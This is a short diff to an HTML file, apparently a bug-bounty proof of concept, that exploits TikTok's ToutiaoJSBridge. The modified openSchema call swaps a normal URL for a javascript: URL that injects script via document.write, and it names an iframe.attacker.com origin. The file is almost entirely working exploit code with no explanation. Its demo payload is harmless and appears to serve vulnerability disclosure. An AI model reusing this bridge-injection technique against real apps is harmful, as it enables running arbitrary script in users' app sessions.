--- a/xss.html
+++ b/xss.html
@@ -1,13 +1,19 @@
+<html>
+<body>
 <script>
 window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
     "__callback_id": "0",
     "func": "openSchema",
     "__msg_type": "callback",
     "params": {
-        "schema": "aweme://wiki?url=https://gmail.com&disable_app_link=false"
+        "schema": "aweme://wiki?url=javascript://m.tiktok.com/%adocument.write('HAHAHAHAHAHA')&disable_app_link=false"
     },
     "JSSDK": "1",
     "namespace": "host",
     "__iframe_url": "http://iframe.attacker.com/"
 }));
+    
+document.write("Let's go!<br>");
 </script>
+</body>
+</html>
